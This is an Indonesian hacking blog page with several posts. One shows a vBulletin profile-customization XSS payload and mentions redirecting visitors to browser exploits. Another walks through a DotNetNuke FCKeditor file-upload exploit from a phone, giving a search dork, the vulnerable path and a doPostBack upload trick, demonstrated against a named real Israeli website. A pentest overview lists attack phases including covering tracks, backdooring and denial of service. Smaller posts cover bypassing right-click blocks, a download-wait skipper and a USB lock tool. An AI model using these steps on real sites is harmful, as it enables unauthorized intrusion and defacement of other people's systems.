Jumat, 03 Februari 2012

vBulletin XSS Exploitation

Latar Belakang Kita semua pasti mengetahui mengenai aplikasi vBulletin.

Ya vBulletin merupakan aplikasi forum dimana ketika kita mendengar mengenai aplikasi tersebut, terlintas di pikiran kita adalah suatu aplikasi yang “cukup aman”.Tetapi seiring dengan perkembangannya, ada beberapa fitur yang ditambahkan semisal “profile customization”, sehingga tidak menutup kemungkinan akan munculnya vulnerability/kelemahan baru dalam aplikasi tersebut.
Pada area kustomisasi, pengguna sangat mungkin untuk menambahkan atau merubah kode warna seperti : #00112233, kode RGB seperti rgb(255, 255, 255) dan bahkan gambar!. Ini sangat dimungkinkan dengan menambahkan url(‘path/ke/gambar.jpg’). Bahkan bisa lebih dari itu…
vBulletin Dengan fitur baru dari vBulletin cms ini dimana sistem dapat menerima input dari user, sangat dimungkinkan untuk disisipi kode-kode tertentu untuk kepentingan tertentu. Misalnya memasukkan string tertentu ?’ABCD”/\>< .

vBulletin Seperti yang terlihat pada gambar diatas, kustomisasi profil pada vBulletin mengijinkan karakter untuk dimasukkan(bahkan meskipun inputan tersebut invalid).
Pada contoh diatas, setiap aphostrope(kutip satu ‘) dirubah menjadi : \’ dimana langkah ini adalah baik karena jika hal tersebut diijinkan hacker dapat sangat mungkin untuk menambahkan javascript ke dalamnya. Tetapi ada 1 hal lainnya yaitu quotes(kutip dua) dan tag HTML tidak di-encode/di-escape. Ini sangat memungkinkan hacker untuk melakukan injeksi tag HTML. Namun script javascript disini tidak dapat di-inject kedalamnya, karena penggunaan dari preg_match() nya PHP.
Bukan berarti tag <script> tidak dapat digunakan dikarenakan di-encode oleh sistem lalu itu berarti hacker tidak dapat mengeksekusi javascript. Lihat contoh script dibawah ini :

Ternyata kita dapat menambahkan suatu gambar secara penuh ke dalam profile page yang kita miliki.
Lalu Bagaimana Dengan Javascript?
Misalkan kita mencoba memasukkan suatu string seperti format berikut di bawah ini :
url(<script>img src=”x:x” onerror=”alert(String.fromCharCode(72,101,108,108,79,32,118,52,76))” />)
Akan keluar tampilan seperti di bawah ini :
Ternyata Javascript pun dapat dieksekusi pada vBulletin software. Sebetulnya serangan XSS berbahaya jika serangan tersebut berhasil melakukan redirect dari server asal ke server milik hacker yang memungkinkan serangan browser exploit seperti Exploit pada IE6,7,8 atau serangan IE_Aurora. Suatu string yang disisipkan untuk melakukan redirecting halaman dapat digambarkan seperti pada kode dibawah ini : (untuk melihat kode dibawah, klik pada kotak “my affiliations” ) Kode diatas hanyalah contoh saja…saya tidak menyimpan exploit di web server yang saya miliki :P
Dari contoh kode diatas sangat memungkinkan untuk dilakukan remote exploit melalui vBulletin. Mudah2an informasinya bermanfaat.
Pencegahan :
1. Pastikan anda menggunakan browser terbaru(paling up-to-date) ketika akan melihat user profile pada forum vBulletin, setidaknya langkah tersebut dapat meminimalisir serangan browser exploit.
Seluruh data diatas hanyalah untuk tujuan informasi saja. Untuk setiap penyalahgunaan penulis tidak bertanggung jawab.

Follow Blog Me
Diposting oleh di Tidak ada komentar:

Mengatasi Klik Kanan Pada Website

Bagi orang yang sering berselancar di dunia internet, mungkin pernah menemukan sebuah website yang tidak diperbolehkan untuk mengklik kanan mouse dengan memasang sebuah script dari java script agar isi posting tidak dapat di copy dengan klik kanan mouse, memang sungguh sangat menjengkelkan, karena terkesan website tersebut terlalu menjaga agar postingnya tidak dapat di copy, sementara posting tersebut mungkin dibutuhkan untuk menyelesaikan tugas sekolah.
Tapi apapun yang mereka lakukan untuk memprotek posting mereka agar tidak dapat di copy, sebenarnyapercuma dan sia sia saja. Karena bagaimanapun juga tetap saja posting mereka dapat di copy dan disimpan di file pengunjung.
Ada beberapa cara untuk mengcopy website mereka antaralain :
  1. Dengan menyimpan Website mereka ke file berbentuk HTML, caranya, pada brows klik menu file, Save Page As, maka website mereka dapat tersimpan beserta posting mereka di file komputer kita dan kita dapat membukannya secara off line
  2. Dengan menyorot artikel mereka kemudian menekan tombol Ctrl+C, kemudian di pastekan di program Notepad, maka isi posting mereka sudah tercopy ke komputer kita. apalagi bila dipaste di microsoft word, maka seluruh isi posting mereka berikut gambar-gambarnya dapat kita ambil menjadi sebuah file word
  3. Dengan cara menggunakan tombol Print Screen, kemudian di pastekan dengan menggunakan program adobe Photoshop atau Pain brush dan simpan dalam file berbentuk tif kemudian dengan menggunakan fasiltas menu Recognize text using OCR, lalu setelah menjadi teks gunakan menu Send text to word.
  4. Dapat juga dengan cara mendisable atau menon aktifkan program java script, yang mencegah klik kanan dengan menggunakan sebuah addons mozilla firefox, nama program tersebut adalah RightToClick, silahkan Donwload Disini bila keluar pesan tidak dapat klik kanan, centrang kotak stop Klik kanan kemudian klik Ok, maka anda bisa menggunakan klik kanan mouse sepuasnya
  5. Bisa dilakukan dengan cara “Mendisable JavaScript“, disemua browser ada fungsi ini. Silakan lakukan eksperimen untuk mencari dimana letak informasi mengenai “Disable JavaScript“, berikut ulasan penjelasannya:

    Disable JavaScript in Internet Explorer (IE)

    1) Buka Internet Explorer (IE)
    2) Pada Menu Navigasi Klik: Tools – Internet Options
    3) Pilih Pada: Security Tab – Custom Level
    4) Scroll Down sampai ketemu “Active Scripting” dan Klik “Disable
    5) Ok.

    Disable JavaScript Mozilla Firefox

    1) Buka Mozilla Firefox
    2) Pada Navigasi Menu Klik: Tools – Options
    3) Kemudian Klik: Content tab, Un-check “Enable JavaScript
    4) Ok

    Disable JavaScript Google Chrome

    1) Pada Google Chrome ShortcutKlik Kanan -> Pilih Properties.
    2) Pada field textbox “Targeted file“, tambahkan “-disable-java” pada bagian belakang.
    "C:\Documents and Settings\Administrator.SNAKE\Local Settings\Application Data\
Google\Chrome\Application\chrome.exe" -disable-javascript
Jadi sebenarnya percuma saja kan fasilitas tersebut dipasang di website :)
Diposting oleh di Tidak ada komentar:

Penetration Testing Concept

Kemaren saya sudah share tentang Penetration Testing Concept, yang Insya Allah akan ada kelanjutannya dengan membahas masing-masing point yang sudah diterangkan. Namun sebelum itu, saya mau share dulu tentang Informasi yang saya dapatkan sebelum ini.
Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.
Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.
Silakan ditonton  implementasinya pada video berikut:
Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.
Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“.  Silakan dilihat detailnya digambar berikut:
KromCat Catalog
roadmap presented by vulnerabilitydatabase
Jika ingin melakukan aktifitas penetration testing atau audit untuk website / target. Sebaiknya siapkan peralatan di atas untuk menunjang keberhasilan aktifitas yang dilakukan.
Semoga informasi ini bermanfaat buat anda semua.
Diposting oleh di Tidak ada komentar:
Hallo Semua

Sebelum Membaca Artikel Berikut, Silakan Follow Blog Me

Oke, yuk kita lanjut.. Dan selamat menimba ilmu di http://h4cker1ndonesi4.blogspot.com/

, dimana untuk melakukan proses penetration testing anda harus memahami konsep-konsep yang baik untuk memperoleh hasil yang baik. Tanpa konsep-pun sebenarnya bisa , saya sendiri kadang juga gak pake konsep-konsepan. Kzkz.. Just LOL :)
Penetration Testing adalah metode untuk mengevaluasi keamanan sistem komputer atau jaringan dengan mensimulasikan serangan dari sumber yang berbahaya. Sebagai contoh serangan yang dilakukan oleh “Black Hat Hacker”, “Cracker”, “Defacer”, Dsb.
Proses ini melibatkan analisis aktif terhadap sistem untuk setiap kerentanan potensial yang diakibatkan oleh sistem yang lemah atau konfigurasi sistem yang tidak benar atau kelemahan operasional dalam proses teknis. Masalah keamanan yang ditemukan akan disampaikan kepada pemilik sistem bersama dengan penilaian dampak dan mitigasi (solusi teknis) dari setiap kerentanan yang ditemukan.
Tujuan Penetration Testing diantaranya adalah untuk menentukan dan mengetahui serangan-serangan yang bisa terjadi terhadap kerentanan yang ada pada sistem, mengetahui dampak bisnis yang diakibatkan dari hasil ekpoitasi yang dilakukan oleh penyerang.
Penetration Testing adalah salah satu komponen penting dari Security Audit .
Yuk kita lanjutkan, ke konsep-konsep Hacking For Penetration Testing
NOSTEPOBJECTIVETECHNIQUETOOLS
1Footprintingadress range, namespace, informationssearch engines, whois, DNS zone transferwhois, host, usenet, edgar db, dig, nslookup, samspade, google
2Scanning Fingerprintingidentification of services, entry pointsping sweep, TCP/UDP scan, OS detection, netBIOS, SNMP, VPNnmap, unicornscan, paketto, queso, siphon, scanline, cheops-ng, nbtscan, snmpwalk, ike-scan
3Enumerationidentifying valid user accounts, poorly protected shareslist user accounts, shares, banner grabbingdumpsec, sid enum, nat, legion, dcetest, rpcinfo, showmount, netcat, telnet
4Gaining Accesswhen enough data is gathered, attempt to access system/networkpassword eavesdropping, share brute forcetcpdump, nat, legion, tftp, pwdump, ttdb, bind, IIS .HTR/ISM.DLL, dsniff, ettercap, hydra, brutus-aet2
5Privilege Escalationif only user level acces with last step, gain complete control (root/admin)password cracking, known exploitsrainbow crack, ophcrack, john the ripper, ophcrack, l0phtcrack, local exploits
6Pilferinggain access to trusted systems/networkevaluate trusts, search for cleartext passwordsrhosts, hosts, lsa secrets, user data, config files, registry, scripts, services
7Covering Tracksownership system completed, hiding intrusionclear logs, hide toolslogcleaner-ng, winzapper, rootkits, file streaming
8Backdooringconfiguring trap doors to easily regain privileged accesscreate user, schedule batches, infect startup files, trojanisation, remote controlcron, at, rc, netcat, keystroke loggers, fpnwclnt.dll, tini, adore, vnc, bo2k
9Denial of Serviceif attempt of hack not successful, disable target (revenge)SYN flood, ICMP techniques, SRC/DST-SYN-requests, OOB, DDoSsmurf, bonk, jolt, land, nestea, newtear, syndrop, teardrop, winnuke, trinoo, tfn2k, slowloris, loic

Berikut ini penjelasan detail Alur Proses Penetration Testing:
Alur Proses Penetration Testing
Silakan Klik Untuk Memperbesar Gambar Penetration Testing Roadmap

Kemudian kita akan melanjutkan ke metode untuk “Web Application Penetration Testing“, metode yang bisa di pakai yaitu:
  1. Passive Penetration Testing: Dalam hal ini yang dilakukan adalah kita melakukan pemetaan dan pengujian terhadap kontrol yang ada didalam webapplication, login dan konfigurasinya, sehingga kita bisa memetakan target system.
  2. Active Penetration Testing: Yaitu kita melakukan kegiatan aktif dalam pengujian terhadap keamanan system dengan melakukan manipulasi imput, pengambilan akses, dan melakukan pengujian terhadap vulnerability-vulnerability yang sudah ada.
  3. Aggressive Penetration Testing:  Melakukan eksploitasi terhadap vulnerability, melakukan reverse enginering terhadap software dan system. menanamkan backdoor, mendownload code, mencoba mengambil alih finansial dan informasi yang ada di server.
Adapula resource yang sangat menarik untuk anda pelajari, namanya “Information Security Assessment Framework“. methodologynya sangat keren, berikut adalah design assessmentnya:
Adapun penjelasan detailnya mengenai design di atas bisa anda download dua file berikut
ISSAF DRAFT 0.2.1A
ISSAF DRAFT 0.2.1B

By : Binushacker
Hal ini merupakan dasar bagi anda yang ingin menjadi “Professional Hacker"
Diposting oleh di Tidak ada komentar:

Hacking Website Lewat HP

Hack Website Lewat HP
Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:
1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-
Diposting oleh di Tidak ada komentar:

Donwload Tanpa Loading

Mau sedikit share tentang cara mendownload file tanpa perlu lama menunggu. Biasa banyak banget nih yang download dari MEDIAFIRE, RAPIDSHARE, HOTFILE, MEGAUPLOAD. Tapi masing menunggu 30-60 detik untuk click, bahkan bisa jauh lebih lama :)
Padahal sebenernya juga cukup mudah sih, tinggal memakai plugin berikut di Mozilla Firefox anda. Hanya beberapa 1-5 detik saja, anda sudah bisa download sepuas-puasnya.
Download File Untuk Mozilla Firefox Disini:
http://dl.skipscreen.com/files/SkipScreen-Setup.exe
Setiap kali anda berkunjung ke website untuk download, maka screen ini pasti akan muncul (Kekurangannya sih cuman ini doank).
Berikut adalah support tools yang include didalam nya:
  • Rapidshare (don’t click! it’s automatic!)
  • Megaupload (captcha action coming soon!)
  • Mediafire
  • Uploaded.to
  • zShare (now with a “listen-first” option!)
  • Sharebee
  • DepositFiles
  • Sendspace
  • Divshare
  • Linkbucks
  • Link-protector
Oke, selamat menikmati download & tanpa perlu lagi menunggu.
Enjoy All :)
Diposting oleh di Tidak ada komentar:

Mengunci Komputer Dengan Flasdisk

FLASHDISK atau media penyimpanan lain melalui port USB dapat digunakan sebagai sebuah alat untuk security atau keamanan
PREDATOR adalah software untuk mengunci PC Anda ketika Anda pergi, bahkan jika sesi windows anda masi terbuka.Dengan menggunakan perangkat USB flashdisk anda dapat mengunci komputer anda dan akan bekerja sebagai berikut :
  • Masukkan USB flashdisk anda ke port USB komputerAnda
  • Jalankan program PREDATOR (atau anda dapat menggunakan auto start) yang telah anda install
  • Lakukan pekerjaan anda pada komputer
  • Ketika anda harus meninggalkan komputer anda untuk melakukan sesuatu kegiatan dan akan melanjutkan kembali, anda tidak perlu mematikan komputer anda dan menutup segala pekerjaan anda, cukup dengan mencabut USB flashdisk anda.
  • Bila anda mencabut perangkat USB flashdisk anda, Keyboard dan mouse otomatis tidak dapat digunakan, dan layar monitor akan blank gelap.
  • Saat anda kembali untuk melakukan pekerjaan anda pada komputer, masukkan USB Flashdisk anda ke port USB tadi, maka Layar komputer akan tampil kembali, dan mouse serta keyboard akan aktif.
Lebih mudah dan lebih cepat daripada Anda menutup sesi Windows, karena Anda tidak perlu mengetik ulang password anda ketika anda kembali.
Advanced Security Features:
  • Lindungi komputer dengan flash drive tunggal. PREDATOR dapat mengirim pesan peringatan melalui Email atau SMS.
  • PREDATOR mencatat semua kejadian yang berhubungan dengan keamanan dalam file log: mulai, alarm, stop. Dengan membaca log ini, Anda akan tahu jika penyusup telah mencoba menggunakan komputer Anda saat Anda telah pergi.
  • PREDATOR dapat mereplikasi log ini di akun Twitter Anda, memungkinkan Anda untuk jarak jauh memonitor semua aktivitas akses-kontrol pada PC Anda.
  • PREDATOR melakukan perubahan kode keamanan yang tercatat pada drive USB anda. Jika seorang penyusup berhasil untuk mengkopy flashdisk Anda, ini tidak akan bekerja karena kode pada flashdisk Anda sendiri akan berubah untuk sementara.
  • PREDATOR Menonaktifkan tugas Windows manager ketika Anda mencabut USB drive. Tidak ada yang dapat menghentikannya dengan Ctrl-Alt-Del.
  • PREDATOR memungkinkan Anda mendapatkan kembali kontrol dari komputer Anda jika Anda kehilangan flashdisk : ketika Anda mulai perangkat lunak untuk pertama kalinya, Anda menetapkan sandi yang akan membuka sesi Anda jika USB drive anda hilang atau rusak
  • PREDATOR dapat membunyikan alarm yang dapat didengar jika seseorang ingin menggunakan komputer dengan memasuki password tidak benar.
  • Dan PREDATOR dapat melindungi beberapa PC dengan USB flash drive yang sama, misalnya untuk komputer rumah anda dan komputer kantor.
Dengan PREDATOR, keamanan adalah yang sederhana seperti memasukkan atau mengeluarkan USB stick.
Berminat?
Ada dua versi predator, Versi free dan versi Professional Editions, dimana untuk versi Professional Editions anda harus membeli lisensinya, lihat gambar tabel perbedaan antara versi free dan Professional Editions
Kedua2nya dapat dignakan pada
Windows XP SP3
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Download versi free
Untuk Windows 32 Bit
Untuk Windows 64 Bit

Untuk versi Professional Editions anda dapat mengklik link Home Page
Diposting oleh di Tidak ada komentar:
Langganan: Komentar (Atom)